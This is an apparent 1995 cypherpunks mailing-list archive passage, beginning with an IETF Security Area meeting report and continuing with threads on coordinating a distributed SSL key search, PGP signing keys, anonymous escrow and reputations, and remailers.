Received: from big-screw.mit.edu(18.72.0.176) by relay.tis.com via smap (g3.0.1) id xma004617; Fri, 1 Sep 95 16:07:54 -0400
Received: by big-screw id AA23873; Fri, 1 Sep 95 16:18:03 -0400
Date: Fri, 1 Sep 95 16:18:03 -0400
Message-Id: <9509012018.AA23873 at big-screw>
>From: "Jeffrey I. Schiller"
Sender: jis at mit.edu
To: minutes at cnri.reston.va.us
Subject: IETF Security Area Report (July 17-21, 1995: 33rd IETF meeting)
Cc: secdir at TIS.COM, saag at TIS.COM
Status: R

IETF Security Area Report
Jeff Schiller and Jim Galvin
jis at mit.edu galvin at tis.com
July 17-21, 1995

The Security Area within the IETF is responsible for development of security oriented protocols, security review of RFCs, development of candidate policies, and review of operational security on the Internet. The Area Director is assisted by a Directorate, an advisory entity with no standards-setting powers. The members of the Security Directorate are as follows.

Jeffrey I. Schiller
Ran Atkinson
Steve Bellovin
Steve Crocker
Barbara Fraser
James M. Galvin
Phil Karn
Steve Kent
John Linn
Clifford Neuman
Rob Shirey
Ted Ts'o

In addition to the Directorate the Security Area is assisted by the Security Area Advisory Group (SAAG). The SAAG is an open group that meets at least once during each IETF meeting as well as electronically via the saag at tis.com mailing list.
Send a message to the address saag-request at tis.com to join the list.

During the Security Area Advisory Group (SAAG) meeting, the activities of the Security Area, including the Directorate, are reported and discussed. In addition, the SAAG meeting provides an opportunity for open discussion of security issues. Included below is a summary from those working groups and birds of a feather sessions with security relevant activities to report and the Security Directorate meeting summary. In addition, the following topics were discussed during the SAAG meeting.

o Documents Approved as Proposed Standards

The IESG approved the advancement of five of the IPSEC documents to proposed standards. With the advancement of these documents the IPSEC working group will focus on issues related to key management.

The IESG approved the advancement of the two MOSS documents to proposed standards. With the advancement of these documents the PEM working group has completed its charter and will be closed.

o Domain Name System Security

The last revision of the enhancements for the DNS to support security has been released. It will enter working group last call very soon; no issues are expected to be raised. At the end of the working group last call the document will be submitted to the IESG to be considered for publication as a Proposed Standard. An implementation of the specification is available to U.S. and Canadian sites and individuals via anonymous FTP (see ftp://ftp.tis.com/pub/DNSSEC/README for details).

o Key Management

It was noted that the Internet needs two kinds of key management: one for short-term keys and one for long-term keys. The expected usage of short-term keys would be on a per connection or per message basis. Long-term keys, on the other hand, would probably be used to exchange short-term keys. The distribution and management of long-term keys requires the existence of a global infrastructure.
There are two options for the global infrastructure today: Secure DNS or The Directory (X.500). It is also possible that something completely different will be needed and developed. Key management is expected to get increasing attention in the IETF.

o Internet Security Architecture

Steve Crocker gave an abbreviated version of his presentation to the IAB the previous evening. He posed a challenge to the community to improve the network security at IETF meetings. The specific proposal is to have IPSEC available with manual keying, which would be enough to make a difference when compared to the current configuration. This should be available for use in the IETF terminal room by both the terminals/workstations and laptops. In addition, we should install a demonstration firewall that is IPSEC friendly. The goal is to make it available at the next IETF meeting in Dallas (December 4-8, 1995).

The activity of the following working groups and birds of a feather sessions was reported.

o Secure Socket Layer (SSL) BOF

A consensus developed for the need for a session layer security protocol. This was predicated on observing that IPSEC is below the transport layer and the session layer is above it, and that implementing security in the transport or network layer would require changes to operating systems. In contrast, session layer security could be implemented and added non-invasively to existing systems, thus making security services available to a broad range of application protocols. As a result, a working group called Session Layer Security will be proposed. The Secure Socket Layer specification will serve as the starting point for the new working group.

o Internet Secure Payments Protocol (ISPP) BOF

This BOF met two times with more than a dozen technology presentations. Fortunately, the various technologies are much more similar than they are different. The consensus was that the IETF should have one or more working groups in this area.
Charters will be proposed and submitted to the area director for consideration.

o Simple Key Management for IP (SKIP) BOF

SKIP is Sun's proposal for key management on the Internet. It is a competitor to the Photuris specification being discussed in IPSEC. It is still undecided as to whether this specification should be discussed as part of the IPSEC working group or within its own working group. Although there appeared to be consensus to move the SKIP specification onto the standards track, the authors will need to discuss the process and relationship to IPSEC with the area director and the Chairs of the IPSEC working group before this can be done.

[Note: Since the IETF meeting took place discussions between the various parties are proceeding. The likely outcome will be for the SKIP work to take place within the IPSEC working group.]

o Authenticated Firewall Traversal (AFT)

There are currently four implementations underway with interoperability testing expected to begin shortly. If the testing is successful three documents will be submitted to the IESG to be considered for publication as Proposed Standards before the next IETF meeting in Dallas.

o Common Authentication Technology (CAT)

The CAT working group discussed topics related to active documents, including GSS-V2 (to receive another set of specific revisions at the Internet-Draft level, and then to be recommended for advancement to Proposed Standards), IDUP (where revised interface specifications and a new mechanism specification were discussed, with standards advancement to be considered at the Dallas IETF), GSS-API Negotiation (new draft discussed), Kerberos mechanism and extensions (status and comments discussed, new drafts to follow), FTP Security (to be recommended for advancement to Proposed Standard after inclusion of clarifying revisions), and a presentation of a new mechanism based on FIPS PUB JJJ cryptography.
Presentations on work in progress included GSS-API integration into World-Wide Web browsers and servers, loadable GSS-API multi-mechanism support, and discussion of the use of RFC-1731 as a generic framework for integration of security tokens into text-based applications. The group also discussed a range of candidate follow-on topic areas related to authorization, and identified a subset with apparent common value and feasibility for proposals and work by group members.

o Web Transaction Security (WTS)

There were three short presentations on related subjects and a review of the two documents being developed by the working group. With respect to the requirements specification, several new issues were raised at this meeting and most, but not all, were resolved. There was consensus to resolve the remaining issues on the list and then submit the document to the IESG to be considered for publication as an information RFC. Recent changes to the SHTTP document were reviewed and no objections were raised. An outstanding issue is coordinating SHTTP with MOSS, which is dependent on the harder (and outside our scope) problem of coordinating HTTP with MIME. We remain hopeful that we will reach consensus on a document to propose to advance to Proposed Standard by the next IETF meeting in Dallas.

o IP Security (IPSEC)

The interoperability testing of the recently approved Proposed Standards was discussed. The majority of the meeting was devoted to discussing Internet key management and the two working documents on Photuris and ISAKMP.

o Site Security Handbook (SSH)

Two documents are expected to be available by the first week of November, which will allow for final revisions to be proposed during the next IETF meeting in Dallas followed by advancing the documents onto the standards track as quickly as possible.

The Security Area Directorate met on Monday afternoon for a 2 hour meeting. In addition to all of the above, the following was noted.
o Intellectual Property Rights (IPR)

The purpose of the discussion was information exchange. Several protocols are pending in the IESG as a result of unresolved IPR issues and several protocols from the security area are about to be submitted to the IESG with unresolved IPR issues. It is uncertain exactly what the outcome will be of any specific case.

o Key-ed MD5

Key-ed MD5 is being used in a variety of protocols for authentication. The IETF needs an applicability statement which includes advice on how often to change the secrets.

From hal9001 at panix.com Fri Sep 1 21:38:08 1995
From: hal9001 at panix.com (Robert A. Rosenberg)
Date: Fri, 1 Sep 95 21:38:08 PDT
Subject: O.J. ObCrypto: Fuhrman's Folly Fans Fakery Fears...
Message-ID:

At 12:13 9/1/95, Bill Stewart wrote:

> > I do not think that PGP 2.x can easily (ie: Automatically) use one key for
> > Signing and another for Encrypting a Message (it does both at the same time
> > if you ask). If I "Clear Sign" a message and then Encrypt it, then I get
> > the result but I'm not sure if doing the decrypt on such a message will
> > automatically spot the signature and verify it (as would occur with a E+S
> > pass).
>
> PGP identifies the key for decryption and signature checking from the message.
> When you're signing a message or key, you can pick which of your keys to
> use with the -u option.

OK - I'll rephrase my query/quandary.
If I create a message by feeding in plain text and asking for an Encrypt and Sign, is the FORMAT of the resulting file different from one where I Sign the Text and then (in a separate step/pass) Encrypt the Signed Message (IOW, is E+S just a short cut for the two processes done in sequence using the same key for both operations)? If E+S is only a short-cut, then doing the steps separately will give the result that PGP3 will get automatically with its Separate Function Keys Feature.

> The difficulty is getting people to use your
> encryption key instead of your signature key when encrypting stuff for you.
> Derek mentioned one approach (get people to load the encryption key first);
> unfortunately, you can't predict their behavior, and if you change encryption
> keys more often than signature keys, they'll load the newest encryption key
> last.
> Another approach is to identify them in the names - my key certification key
> says "KeyCert-only" in the text.
>
> For the problem that started this discussion, though, there's no good solution.
> Since the Bad Guys _can_ encrypt a message to you with your signature key,
> and send it to you by anonymous remailer, they can plant a reason to suspect
> that you may have evidence encrypted with that key.

This will all become (more) academic once PGP3 comes out and Sign-Only keys would not be usable for Encryption.

From hal9001 at panix.com Fri Sep 1 21:38:32 1995
From: hal9001 at panix.com (Robert A. Rosenberg)
Date: Fri, 1 Sep 95 21:38:32 PDT
Subject: SSL search attack
Message-ID:

At 12:15 9/1/95, Lou Poppler wrote:

> The ACK process and the allocation process are separate, and should
> remain so. They run on different servers, and they run as separate
> processes in the unix version of brloop. A little tweaking of brloop
> could allow pre-fetching of the next segment to search, without any
> effect on the ACK process. I dislike the idea of a client sending an ACK
> before it has searched the entire segment.

I was not suggesting that.
I was just suggesting that the initial request be for twice the amount of segments as you want to process during your reporting interval and that, except when you are getting ready to shut down, you have one allocation ready as a spare in case you can't immediately be given another allocation when you ACK one.

Example: I will be running for 8 Hours and I will report back every 30 minutes. I get an hour's worth of segments (Chunk 1 + 2) when I first connect. After 30 Minutes, I'm done with half of them. I then ACK that half (Chunk 1) and request another 30 minutes' worth of segments (for scanning at 1H-1.5H). If I do not get it, I'm still working on the 2nd Chunk. At 1H, I ACK Chunk 2 and ask for Chunk 4 (also I ACK Chunk 1 and/or request Chunk 3 if either failed the first time at .5H). This continues until 7.5H when I ACK and do not request a Chunk 17 (since I already have or I am requesting Chunk 16 for the 7.5H-8H period).

From hal9001 at panix.com Fri Sep 1 21:38:36 1995
From: hal9001 at panix.com (Robert A. Rosenberg)
Date: Fri, 1 Sep 95 21:38:36 PDT
Subject: SSL search attack
Message-ID:

At 07:25 9/1/95, Daniel R. Oelke wrote:

> > I see nothing wrong with the concept of being allocated an initial chunk
> > and having the scan software attempt to ACK it when 50% of it has been
> > searched. A successful ACK would allow the releasing of a new chunk (in
> > response) equal in size to the returned chunk. A failure of the Server to
> > accept the ACK would trigger a retry at set intervals (such as 75% and 100%
> > or 60/70/80/90/100%) until the Server responds. Thus the scanner is always
> > in possession of a Full Sized Chunk to scan (so long as the Server accepts
> > an ACK before the 100% done mark) and temporary failures will not stop the
> > process of a scanner as currently happens.
>
> The only way this can work is if the server is told it is a 50%/75%/etc
> size ACK, and then later the server is ACKed for the full 100%.
>
> Why?
> Because what happens if the client dies immediately after doing
> the ACK - maybe only 51% of that space has been searched, yet
> the server has already seen an ACK for it.

I thought that the ACK gives starting location and number of segments. If I get 500 segments and ACK at the 50% point I am sending an ACK for the Starting Point and 250 Segments (the unprocessed part would then ACK Start+250 for 250 when done), just as if I had only gotten 250 in the first place and was also given the next 250 Segment Chunk (ie: I was "Next Requester" after my original allocation of 250).

> IMO - a % ACK is too much complexity and extra work on the server,
> which is already having trouble keeping up.

No - It is the same load if you allow the first request to be twice the size of the subsequent requests. If you ask people to request 30 minutes' worth of segments, there is no difference in load (if the Server responds to each ACK when first attempted) if they start each run with a 1 hour chunk (ie: 2X Chunk) and check in every 30 min to ACK a Chunk (and to get the one to be worked on in half an hour [and when you are 30 minutes away from your shut down time, just ACK and do not request another chunk]) versus just getting an X sized chunk at your initial connection. In the 2X method, you still have an X sized Chunk to work on for the next 30 Minutes if the Server is ignoring your ACK attempt (and when that Chunk has been scanned you return both and get two more). This is hitting the Server once every 30 minutes and NOT pounding away at it until you get an ACK through (and more get more work) since you have no need for another chunk immediately (as you would with the X sized Chunk every 30 minutes method) and thus have no need to retry on a connect failure.

From tcmay at got.net Fri Sep 1 21:44:22 1995
From: tcmay at got.net (Timothy C. May)
Date: Fri, 1 Sep 95 21:44:22 PDT
Subject: Cyphernomicon, and a section on Escrow and Reputations
Message-ID:

I've been asked by two people in e-mail what the "Cyphernomicon" I referred to in a recent message is. It's been a while since I mentioned it, so I'll give some details.

In late 1993 I foolishly committed to doing a "Cypherpunks FAQ," as several earlier attempts had gone nowhere. And since the most frequently asked question of all is always "Where's the FAQ?," followed closely by "How come there isn't a FAQ?," the need was there. (As it turns out, the people most in need of a FAQ seldom read FAQs, but this is another story.)

I finished my first release, a megabyte-sized file done in MORE, a powerful outline processor (which enabled me to maintain notes, make cross-references, and generally manage such a huge writing project). I released it last year, and put it in my anonymous ftp account at ftp.netcom.com, in the directory /pub/tc/tcmay, as the file CP-FAQ. Netcom is often very crowded, though.

I know of a couple of alternative places. A very nice job of HTMLizing it was done by Jonathan Rochkind, a Cypherpunk, and is located at the URL http://www.oberlin.edu/~brchkind/cyphernomicon/

Another URL, which is just one large file, is http://www.swiss.ai.mit.edu/6095/articles/cyphernomicon/CP-FAQ

The recent thread about the dangers of anonymity and the role of escrow agents as possible fixes is a good excuse to include one of my sub-sub-subsections, to also illustrate the structure and expected contents. Enjoy it. But, please, don't nag me with suggestions that I should do, or should have done, the thing in HTML, or using your favorite tool set.

--Tim May

Crypto Anarchy: Escrow Agents and Reputations

16.24.1.
Escrow Agents as a way to deal with contract reneging
  - On-line clearing has the possible danger implicit in all trades that Alice will hand over the money, Bob will verify that it has cleared into his account (in older terms, Bob would await word that his Swiss bank account has just been credited), and then Bob will fail to complete his end of the bargain. If the transaction is truly anonymous, over computer lines, then of course Bob just hangs up his modem and the connection is broken. This situation is as old as time, and has always involved protocols in which trust, repeat business, etc., are factors. Or escrow agents.
  - Long before the "key escrow" of Clipper, true escrow was planned. Escrow as in escrow agents. Or bonding agents.
  - Alice and Bob want to conduct a transaction. Neither trusts the other; indeed, they are unknown to each other. In steps "Esther's Escrow Service." She is _also untraceable_, but has established a digitally-signed presence and a good reputation for fairness. Her business is in being an escrow agent, like a bonding agency, not in "burning" either party. (The math of this is interesting: as long as the profits to be gained from any small set of transactions is less than her "reputation capital," it is in her interest to forego the profits from burning and be honest. It is also possible to arrange that Esther cannot profit from burning either Alice or Bob or both of them, e.g., by suitably encrypting the escrowed stuff.)
  - Alice can put her part of the transaction into escrow with Esther, Bob can do the same, and then Esther can release the items to the parties when conditions are met, when both parties agree, when adjudication of some sort occurs, etc. (There are a dozen issues here, of course, about how disputes are settled, about how parties satisfy themselves that Esther has the items she says she has, etc.)
16.24.2. Use of escrow services as a substitute for government
  + as in underworld deals, international deals, etc.
  - "Machinery of Freedom" (Friedman), "The Enterprise of Law" (Benson)
  - "It is important to note in any case that the use of third-party escrow as a substitute for Government regulation was a feature of the Northern European semi-anarchies of Iceland and Ireland that have informed modern libertarian thought." [Duncan Frissell, 1994-08-30]
16.24.3. Several people have raised the issue of someone in an anonymous transaction simply taking the money and not performing the service (or the flip side). This is where _intermediaries_ come into the picture, just as in the real world (bonds, escrow agents, etc.).
16.24.4. Alice and Bob wish to conduct an anonymous transaction; each is unknown to the other (no physical knowledge, no pseudonym reputation knowledge). These "mutually suspicious agents," in 1960s- and 70s-era computer science lingo, must arrange methods to conduct business while not trusting the other.
16.24.5. Various cryptographic protocols have been developed for such things as "bit commitment" (useful in playing poker over the phone, for example). I don't know of progress made at the granularity of anonymous transactions, though. (Though the cryptographic protocol building blocks at lower levels--such as bit commitment and blobs--will presumably be used eventually at higher levels, in markets.)
16.24.6. I believe there is evidence we can shorten the cycle by borrowing noncryptographic protocols (heresy to purists!) and adapting them. Reputations, for example. And escrow agents (a form of reputation, in that the "value" of a bonding entity or escrow agent lies in reputation capital).
16.24.7.
if a single escrow agent is suspected of being untrustworthy (in a reputation capital sense), then can use _multiple_ escrows
  - with various protocols, caveat emptor
  - n-out-of-m voting schemes, where n escrow agents out of m are required to complete a transaction
  - hard to compromise them all, especially if they have no idea whether they are being "legitimately bribed" or merely pinged by a reputation-rating service
  - Hunch: the work of Chaum, Bos, and the Pfitzmanns on DC-nets may be directly applicable here...issues of collusion, sets of colluders, detection of collusion, etc.

From don at cs.byu.edu Fri Sep 1 21:58:01 1995
From: don at cs.byu.edu (don at cs.byu.edu)
Date: Fri, 1 Sep 95 21:58:01 PDT
Subject: SSL attack
Message-ID: <199509020358.VAA00340@wero>

From: "Robert A. Rosenberg"
> I thought that the ACK gives starting location and number of segments. If I
> get 500 segments and ACK at the 50% point I am sending an ACK for the
> Starting Point and 250 Segments (the unprocessed part would then ACK

With multiple hierarchical servers, you don't have the same bottleneck problems. If you have a random mode that you can switch into, same deal (if you care to use it). There are a lot of people who want the anonymity and server-independence of random mode. There are people who don't want to add another 37% onto the processing time, given the unlikeliness of a D.O.S. attack on the server. I continue to support the idea of a two-pronged attack using both methods.
Given that most of the server bottleneck was un-updated clients anyway, I think that the bottleneck-on-the-server problem is solved anyway, meaning there won't be any problems getting new keys - thus eliminating the need for a keyspace buffer queue.

Don

fRee cRyPTo! jOin the hUnt or BE tHe PrEY
PGP key - http://bert.cs.byu.edu/~don or PubKey servers (0x994b8f39)
June 7&14, 1995: 1st amendment repealed. Death threats ALWAYS pgp signed
* This user insured by the Smith, Wesson, & Zimmermann insurance company *

From todd at lgt.com Fri Sep 1 22:07:18 1995
From: todd at lgt.com (Todd Glassey, Chief Technologist, Looking Glass Technologies)
Date: Fri, 1 Sep 95 22:07:18 PDT
Subject: FSTC - Request for Info
Message-ID:

Hi all,

I am now looking for pointers into this mystical consortium of financial wizards... Also do any of you know about online issues pertaining to new network adaptations of Unisys's proprietary banking protocols or the FEDLINE stuff?

TIA
Todd

Regards,
T. S. Glassey
Chief Technologist
Looking Glass Technologies
todd at lgt.com

From jcurran at bbnplanet.com Fri Sep 1 22:33:03 1995
From: jcurran at bbnplanet.com (John Curran)
Date: Fri, 1 Sep 95 22:33:03 PDT
Subject: FSTC - Request for Info
Message-ID:

At 1:05 AM 9/2/95, Todd Glassey, Chief Technologist, Looking Glass Technologies wrote:
> Hi all,
> I am now looking for pointers into this mystical consortium of financial
> wizards...

A good place to start is the FSTC WWW pages: http://www.llnl.gov/fstc

/John

From loki at obscura.com Fri Sep 1 23:33:08 1995
From: loki at obscura.com (Lance Cottrell)
Date: Fri, 1 Sep 95 23:33:08 PDT
Subject: Direct Socket to Remailer?
Message-ID:

At 7:25 PM 9/1/95, ROBO Mixmaster Remailer wrote:
> I've heard of telnetting to port 25 to send SEMI-untraceable e-mail.
> The procedure, quite frankly, sounds rather complicated.
>
> Most of my mail that I don't want traced goes through the Mixmaster
> remailer network. I'm using Winsock-compatible software via a PPP
> connection. Is it possible, for example, to tell my mailer software
> to use the remailer itself, such as "remail.obscura.com" as the mail
> host, rather than "mail.myISP.com"? Will it work, at least for
> sending, without having an account at "obscura.com", or whatever
> remailer? Would that be less traceable than sending it through my
> ISP's mail host?

I don't think it would provide much more security, but it might keep your ISP from logging the mail. If you are using mixmaster at remail.obscura.com as your remailer, you are welcome to use it as the mail host for that mail. It is a slow connection so please do not use it as your regular mail host.

You should try the telnet port 25 trick. It is amazingly simple (but not secure). Just "telnet some.machine.com 25" and type help. It will guide you through it. It is quite informative.

-Lance

----------------------------------------------------------
Lance Cottrell loki at obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra. Suddenly it flips over, pinning you underneath. At night the ice weasels come."
--Nietzsche
----------------------------------------------------------

From davidm at iconz.co.nz Fri Sep 1 23:40:55 1995
From: davidm at iconz.co.nz (David Murray)
Date: Fri, 1 Sep 95 23:40:55 PDT
Subject: A problem with anonymity
Message-ID: <199509020640.SAA23731@iconz.co.nz>

At 05:15 PM 9/1/95 -0700, you wrote:
> At 10:45 AM 9/2/95, David Murray wrote:
> > [Akerlof, if I remember my economics right (and I am confident that I will
> > be corrected if I don't) analysed a market for used cars. ...
> > ... So the only cars for sale would be lemons :-)]
>
> I haven't encountered this example, but it clearly misses some important
> real-world issues. ...
> Like a lot of simple game-theoretic models, the application to the real
> world is quite different.

True. But it does make the point that, in a perhaps surprising way, the bad can drive out the good. [I certainly don't want to get into any kind of normative v. positive methodological debate.] The lesson is not that "You can never find a decent used car", but that, in a market with particular characteristics (particularly with regard to what information is available to whom), lemons drive out the good. This just means that owners of good used cars offer them for sale in a market where pre-purchase checks are possible, etc. But this is to concentrate on the example, not on the substance...

> But I certainly agree that crypto will reignite interest in analyses of
> such game theory questions. Another way of viewing anonymity vs.
> non-anonymity is that knowing the True Name of a party with whom one trades
> is just _one element_ of a transaction. By no means is it essential.

I guess I was using True Name somewhat unusually. I didn't mean "True Name = state approved unique identifier of a human being" so much as "True Name <> easily discardable/transferrable/sellable digital pseudonym".
I certainly did not mean to imply that net.commerce is impossible, or that it would only take place on the basis of True Names, however defined. Rather I was commenting that one pervasive feature of non-net.commerce is the ability to track down someone that owes you something and sue them/beat it out of them. You can't do this to a digital pseudonym. As you rightly pointed out, you can't do this to someone who escapes to South America, or to the guy who runs the market stall that won't be there tomorrow. So you take a bond, or you take your chances. I still think that, because of the (perfect) ease with which net.rep's are transferrable/cash-in-able, the chances you take in the digital domain are so much higher as to be (almost?) qualitatively different.

> > If you can't rely on the unsecured promise of a digital pseudonym, and you
> > can't accept reputation as 'security', how do you extend credit?
>
> I am willing to extend some amount of credit to PrOduct Cypher, Black
> Unicorn, etc., based on their past reputation and on the fact that I can
> show to others the transactions into which their pseudonyms entered and
> thus expose them if they default. Now _how much_ I'm willing to extend is
> of course a more complicated issue, but the principle is still there: a
> purely digital pseudonym, with no possibility of being tied to a True Name,
> can still be extended credit....I just said I would do so.

This would, of course, allow PrOduct Cypher (for example) to cash in on hir rep. [Hir - never thought I'd see myself use it: ughhhhhhh ]. But, unlike the unscrupulous stall owner, who would have to sell the gold watch before he decamped, PC could sell hir rep before the rip-off had been done. This would be a sort of division of labour - rep-builders and rep-exploiters. In cyberspace, you could never tell whether you were dealing with the rep builder (buying a good car) or a rep exploiter (buying a lemon). Yes the rep-exploitation would be a one-shot thing.
Within seconds of the sting PC's name would be mud. [And, yes, you could probably tell whether it was one of those two you were dealing with - if it asked for credit, it wouldn't be 'corn or 'pher :-)] But it is the _possibility_ of the scam that would shape the market. By the way, my final question was not rhetorical. I _do_ think methods of extending credit to pseudonyms will be developed. I just think they will be based on (possibly new) types of security interest. An old type of security interest (perhaps the oldest) could be used right away - the pledge. If Bob Pseudonymous pledges $100 worth of digital certificates, I would be glad to lend him $100 (well, perhaps $80 - gotta secure the interest:-) Cryptography might develop other ways of protecting the interests of creditors, while preserving the anonymity of debtors. In fact, I'm certain it will. And I'm just as sure the law/mercantile practice will assist in the process. And like you, I believe it is not only possible, but preferable, that this is done without the interevention/'assistance' of the state. Cheers, Dm -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMEftjllo3j8JHzalAQE1OwP+IQTX2hUfJXI8Q7ojgFcKbnvxRLngSyDp rLm0wjZvMoiLwCqwhqn6F3ypTJBD0pS1ZT7ql+rnnEsYtQ75Xu0iJFbnnIY4whNh gB1plcImYms88Rt7VEuCjHZeAMHcV3tPZL9DHQVHZXMwqWKCeyBaImVaEosJTwZj IuZ4HHCi+GE= =V7vf -----END PGP SIGNATURE----- From dsc at swcp.com Sat Sep 2 02:15:27 1995 From: dsc at swcp.com (Dar Scott) Date: Sat, 2 Sep 95 02:15:27 PDT Subject: Cyphernomicon, and a section on Escrow and Reputations Message-ID: >I finished my first release, a megabyte-sized file done in MORE, a powerful >outline processor (which enabled me to maintain notes, make >cross-references, and generally manage such a huge writing project). I >released it last year, and put it in my anonymous ftp account at >ftp.netcom.com, in the directory /pub/tc/tcmay, as the file CP-FAQ. Netcom >is often very crowded, though. After several tries I was not able to get this. 
Has anyone made it available in an alternate location?

Dar
(list newbie)

===========================================================
Dar Scott                  Home phone: +1 505 299 9497
Dar Scott Consulting       Voice: +1 505 299 5790 <---
8637 Horacio Place NE      Email: darscott at aol.com
Albuquerque, NM 87111      dsc at swcp.com
                           Fax: +1 505 898 6525
http://www.swcp.com/~correspo/DSC/DarScott.html
My preference for attached files is in this order: AOL, Mime, Binhex4, PGP, UUencode
===========================================================

From terrell at sam.neosoft.com Sat Sep 2 07:42:13 1995
From: terrell at sam.neosoft.com (Buford Terrell)
Date: Sat, 2 Sep 95 07:42:13 PDT
Subject: A problem with anonymity
Message-ID: <199509021451.JAA14144@sam.neosoft.com>

>
>Subject: Re: A problem with anonymity
>From: monty.harder at famend.com (MONTY HARDER)
>
>TC> This is one thing that _bonding_ is designed to partially ameliorate. One
>TC> posts a bond which is greater than the amount being carried, or at least is
>
> A variation of a bond is an escrow agent....
>
> Overload Alert: I use "escrow" here in the more mundane sense of
> the folks who collect your real estate taxes and homeowners'
> insurance from you 1/12th at a time along with your mortgage
> payment, for instance.
>
> If the buyer has a =nonymous= agent to receive the payment, which is
>only released to the seller upon proof(s) of performance (whether in
>lump sum or on a schedule of staged payments tied to specific milestones
>in a long-term project) then the buyer has someone to go after in the
>event of such shenanigans.
>
>TC> There are still scams and maneuvers to thwart this reputation capital
>TC> scheme. The agent planning to "defect" (default, split, abscond, renege,
>TC> etc.) can try to pile up as many pending transactions as possible,
>TC> anticipating that the various transactees will be unaware of each other.
>
> And the escrow method dynamically scales to meet this threat, whereas
>the bond is static.
>
> Of course, the escrow agent will extract his pound of flesh, just as
>any other form of insurance. Such is the nature of life.
>

Actually, you guys are trying to repeat the whole history of the law merchant (today's commercial law). The basic problem was how can a buyer in one city acquire goods from a seller in another through agents acting at a distance when neither knows the other and neither is willing to risk loss on the transaction. The use of bankers, as either trusted or bonded third parties, acting as escrowees under the control of a letter of credit was the result.

Buyer, B, deposits money with the bank, E, with instructions to release the money on proof of receipt of the goods. E gives B a receipt and a written promise to pay. B trades the promise to pay to Seller, S, in exchange for the goods. S, who either trusts E or has access to his bond, is willing to accept E's promise to pay, which he then negotiates. The result is that B and S have a secure transaction without trusting each other, and E gets rich. Notice, we don't care about the reputation or identity of either B or S, and a very few trusted or bonded Es can facilitate many, many transactions.

Incidentally, you all are using the word "escrow" correctly. An escrow is an arrangement in which property is deposited with an escrowee to hold until the happening or failure of a contingency, at which time he delivers the property according to the escrow instructions. House sales, in which the seller deposits a deed and the buyer deposits the purchase price pending proof of title, are only one kind of escrow.

+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
Buford C. Terrell
South Texas College of Law
1303 San Jacinto, Houston, TX 77002
(713)646-1857
terrell at sam.neosoft.com
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

From ethridge at Onramp.NET Sat Sep 2 07:59:29 1995
From: ethridge at Onramp.NET (Allen B. Ethridge)
Date: Sat, 2 Sep 95 07:59:29 PDT
Subject: Macintosh Users: "SpeedDoubler"
Message-ID:

Tim May wrote:
>For you Macintosh users, I thought I'd share with you my experiences with
>SpeedDoubler, a new utility that (effectively) doubles or even triples
>performance of many applications that still are heavily dependent on 68K
>code (as opposed to purely PowerPC code).
>
> ...
>
>All I can say is that I'm very happy.
>
>--Tim May

Just wanted to echo Tim's sentiments. I purchased SpeedDoubler yesterday (fifty-something dollars at Computer City) and the speed improvements I've seen on my PowerMac 7100/66 are impressive. It's definitely worth the money.

allen

From tcmay at got.net Sat Sep 2 09:39:05 1995
From: tcmay at got.net (Timothy C. May)
Date: Sat, 2 Sep 95 09:39:05 PDT
Subject: A problem with anonymity
Message-ID:

At 2:27 PM 9/2/95, Buford Terrell wrote:
>Actually, you guys are trying to repeat the whole history of the
>law merchant (today's commercial law). The basic problem was how
>can a buyer in one city acquire goods from a seller in another
>through agents acting at a distance when neither knows the other
>and neither is willing to risk loss on the transaction.

Which might be why I specifically cited this last night in an article in this thread:

"(Think of various trading situations where one has no idea of the True Name of the other parties: cash-and-carry transactions, flea markets, many international trade arrangements, etc. As we have discussed in past discussions of anarchy, the international trading regime is essentially an anarchy, in that no Higher Authority exists to resolve disputes in a top-down way...the so-called "Law Merchant" evolved to resolve disputes in such trading situations.)"

Benson's "The Enterprise of Law" is of course a libertarian outlook on these matters. (I should mention that Michael Froomkin says he doesn't think much of it, but I found it useful, especially as it confirmed my views on these matters!
:-})

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."

From tcmay at got.net Sat Sep 2 09:54:21 1995
From: tcmay at got.net (Timothy C. May)
Date: Sat, 2 Sep 95 09:54:21 PDT
Subject: Cyphernomicon, and a section on Escrow and Reputations
Message-ID:

At 9:13 AM 9/2/95, Dar Scott wrote:
>After several tries I was not able to get this. Has anyone made it
>available in an alternate location?
>
>Dar
>(list newbie)
>
>===========================================================
>Dar Scott Home phone: +1 505 299 9497
>
>Dar Scott Consulting Voice: +1 505 299 5790 <---
>8637 Horacio Place NE Email: darscott at aol.com
>Albuquerque, NM 87111 dsc at swcp.com
> Fax: +1 505 898 6525
>http://www.swcp.com/~correspo/DSC/DarScott.html

Help me out here, Dar...

You list a Web site in your sig, so presumably you have the right tools to browse the Web. And I listed two Web sites that have the Cyphernomicon.

What am I missing?

Browsing the Web versions, especially the HTMLized version by Rochkind at http://www.oberlin.edu/~brchkind/cyphernomicon/ is a much better way to read it than by downloading the text version.

Nevertheless, if someone wants to copy the CP-FAQ file to their ftp site, I have no real objections at this time.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."

From jim at acm.org Sat Sep 2 10:37:25 1995
From: jim at acm.org (Jim Gillogly)
Date: Sat, 2 Sep 95 10:37:25 PDT
Subject: Phil Zimmermann/Amnesty International?
In-Reply-To: <199509021658.MAA29224@frankenstein.piermont.com>
Message-ID: <199509021737.KAA23763@mycroft.rand.org>

Regarding the statute of limitations date on PRZ,

> "Perry E. Metzger" writes:
> The offense in question took place on or before
> September 8, 1992, and the statute of limitations is, to my knowledge,
> three years. Even if it were four years, it would have to be September
> 8th of that year. Branko Lankester announced availability of PGP 2.0
